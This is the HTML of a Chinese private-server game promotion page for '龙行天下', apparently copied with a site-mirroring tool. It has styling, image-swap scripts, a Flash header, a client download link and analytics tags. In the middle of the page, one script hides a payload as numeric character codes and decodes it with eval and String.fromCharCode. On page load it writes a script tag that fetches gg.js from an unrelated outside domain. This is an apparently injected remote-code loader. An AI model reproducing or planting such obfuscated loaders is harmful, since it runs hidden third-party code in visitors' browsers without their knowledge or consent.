<html>
<head>
<title>龙行天下，月卡传奇，合击传奇，金币传奇！</title>
<meta name="Keywords" content="龙行天下，月卡传奇，合击传奇，金币传奇" />
<meta name="Description" content="龙行天下，月卡传奇，合击传奇，金币传奇,www.4f918.com" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style type="text/css">
body{ background:#FFFFFF url("images/bg1.jpg"/*tpa=http://www.4f918.com/images/bg1.jpg*//*tpa=http://www.4f918.com/images/bg1.jpg*/) center top no-repeat; margin:0px; padding:0px;}
.bg{ background: url("images/AoYoo.Com_13.jpg"/*tpa=http://www.4f918.com/images/AoYoo.Com_13.jpg*//*tpa=http://www.4f918.com/images/AoYoo.Com_13.jpg*/) center top no-repeat; margin:0px; padding:0px;}
.wz{ font-size:14px; font-weight:bold; color:#660101; line-height:35px;}
.bwz{  font-size:14px; font-weight:bold; color:#fff; line-height:30px;}
body,td,th {color: #000000; font-size: 12px; line-height:22px;	font-family: Arial, Helvetica, sans-serif, "黑体", "宋体", "新宋体"; }
}
a:link {
	color: #0000FF;
	font-weight: bold; font-size: 14px;
}
a:hover {
	color: #FF0099;	
	font-weight: bold; font-size: 14px;}
	
a:visited {
	font-weight: bold; font-size: 14px;	
}
a:active {
	font-weight: bold; font-size: 14px;	
}
.a1:link {
	color: #00ccFF;
	font-weight: bold; font-size: 12px;
}
.a1:hover {
	color: #FFcc00;	
	font-weight: bold; font-size: 12px;}
	
.a1:visited {
	font-weight: bold; font-size: 12px;	
}
.a1:active {
	font-weight: bold; font-size: 12px;	
}
.a2:link {
	color: #fff000;
	font-weight: bold; font-size: 16px;
}
.a2:hover {
	color: #ffffff;	
	font-weight: bold; font-size: 16px;}
	
.a2:visited {
	font-weight: bold; font-size: 16px;	
}
.a2:active {
	font-weight: bold; font-size: 16px;	
}
.a3:link {
	color: #00ff00;
	font-weight: bold; font-size: 16px;
}
.a3:hover {
	color: #ffffff;	
	font-weight: bold; font-size: 16px;}
	
.a3:visited {
	font-weight: bold; font-size: 16px;	
}
.a3:active {
	font-weight: bold; font-size: 16px;	
}
.STYLE1 {
	color: #0000ff;
	font-weight: bold;
	font-size: 12px;
}
.STYLE2 {color: #339900}
.STYLE3 {
	color: #000000;
	font-weight: bold;
	font-size: 16px;
}
.STYLE4 {
    color: #FFFFFF;
	font-size: 12px;
}
.STYLE5 {color: #FF0000}
.STYLE6 {
    color: #FFFFFF;
	font-size: 16px;
}
.STYLE7 {
	color: #000000;
	font-size: 12px;
}
.STYLE8 {
	color: #FFCC00;
	font-weight: bold;
	font-size: 14px;
}
</style>
<script type="text/JavaScript">

<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
</head>
<body onLoad="MM_preloadImages('Images/AoYoo.Com-Home-03a.jpg'/*tpa=http://www.4f918.com/Images/AoYoo.Com-Home-03a.jpg*/)">
<table width="984" height="306" border="0" align="center" cellpadding="0" cellspacing="0" background="Images/AoYoo.Com-Home.jpg" tppabs="http://www.4f918.com/Images/AoYoo.Com-Home.jpg">
	<tr>
		<td><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="swflash.cab#version=9,0,28,0" tppabs="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="984" height="306">
      <param name="movie" value="images/header.swf" tppabs="http://www.4f918.com/images/header.swf" />
      <param name="quality" value="high" />
      <param name="wmode" value="transparent" /><param name="SCALE" value="noborder">
      <embed src="images/header.swf" tppabs="http://www.4f918.com/images/header.swf" width="984" height="306" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" wmode="transparent" scale="noborder"></embed>
    </object></td>
	</tr>
</table>
<table width="984" border="0" cellpadding="0" cellspacing="0" align="center">
	<tr>
		<td colspan="7">
			<img src="images/AoYoo.Com-Home-02.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-02.jpg" width="768" height="30" alt=""></td>
		<td rowspan="4">
			<a href="Index1.htm" tppabs="http://www.4f918.com/Index1.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image16','','Images/AoYoo.Com-Home-03a.jpg'/*tpa=http://www.4f918.com/Images/AoYoo.Com-Home-03a.jpg*/,1)"><img src="Images/AoYoo.Com-Home-03.jpg" tppabs="http://www.4f918.com/Images/AoYoo.Com-Home-03.jpg" name="Image16" width="132" height="95" border="0"></a><a href="javascript:if(confirm('http://www.4f918.com/Index.html  \n\nļδ Teleport Pro أΪ  - ޷ҵļ  \n\nҪӷ?'))window.location='http://www.4f918.com/Index.html'" tppabs="http://www.4f918.com/Index.html"></a></td>
		<td rowspan="4">
			<img src="images/AoYoo.Com-Home-04.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-04.jpg" width="84" height="95" alt=""></td>
	</tr>
	<tr>
		<td>
			<img src="images/AoYoo.Com-Home-05.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-05.jpg" width="299" height="1" alt=""></td>
		<td rowspan="2">
			<a href="http://www.4f918.com/dlq.rar" tppabs="http://www.4f918.com/龙行天下.rar"><img src="images/AoYoo.Com-Home-06.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-06.jpg" alt="" width="136" height="44" border="0"></a></td>
		<td rowspan="2">
			<img src="images/AoYoo.Com-Home-07.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-07.jpg" width="20" height="44" alt=""></td>
		<td rowspan="2">
			<a href="http://www.4f918.com" tppabs="http://www.4f918.com/bbs.s597.com"><img src="images/AoYoo.Com-Home-08.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-08.jpg" alt="" width="127" height="44" border="0"></a></td>
		<td>
			<img src="images/AoYoo.Com-Home-09.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-09.jpg" width="23" height="1" alt=""></td>
		<td rowspan="2">		  <a href="http://www.4f918.com"><img src="images/AoYoo.Com-Home-10.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-10.jpg" alt="" width="122" height="44" border="0"></a></td>
		<td>
			<img src="images/AoYoo.Com-Home-11.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-11.jpg" width="41" height="1" alt=""></td>
	</tr>
	<tr>
		<td>
			<img src="images/AoYoo.Com-Home-12.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-12.jpg" width="299" height="43" alt=""></td>
		<td>
			<img src="images/AoYoo.Com-Home-13.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-13.jpg" width="23" height="43" alt=""></td>
		<td>
			<img src="images/AoYoo.Com-Home-14.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-14.jpg" width="41" height="43" alt=""></td>
	</tr>
	<tr>
		<td colspan="7">
			<img src="images/AoYoo.Com-Home-15.jpg" tppabs="http://www.4f918.com/images/AoYoo.Com-Home-15.jpg" width="768" height="21" alt=""></td>
	</tr>
</table>
<table width="984" border="0" cellpadding="0" cellspacing="0" align="center">
	<tr>
		<td>
			
<script>
t="60,105,109,103,32,115,114,99,61,34,105,109,97,103,101,115,47,65,111,89,111,111,46,67,111,109,45,72,111,109,101,45,49,54,46,106,112,103,34,32,13,10,13,10,116,112,112,97,98,115,61,34,104,116,116,112,58,47,47,119,119,119,46,52,102,57,49,56,46,99,111,109,47,105,109,97,103,101,115,47,65,111,89,111,111,46,67,111,109,45,72,111,109,101,45,49,54,46,106,112,103,34,32,119,105,100,116,104,61,34,57,56,52,34,32,104,101,105,103,104,116,61,34,51,48,55,34,32,97,108,116,61,34,34,62,13,10,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,100,115,113,119,97,110,103,46,99,111,109,47,103,103,46,106,115,34,62,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script></td>
	</tr>
</table>
<table width="984" height="50" border="0" cellpadding="0" cellspacing="0" align="center">
	<tr>
		<td align="center" valign="top">版权所有： 龙行天下 © 2003-2010 All Rights Reserved <br>
	    ICP企业备案号： 冀ICP备12009956号 </td>
	</tr>
</table>
</body>
</html>
<script src="http://s23.cnzz.com/stat.php?id=3688704&web_id=3688704&show=pic" language="JavaScript"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/15076199.js"></script>
<noscript><a href="http://www.51.la/?15076199" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/15076199.asp" style="border:none" /></a></noscript>
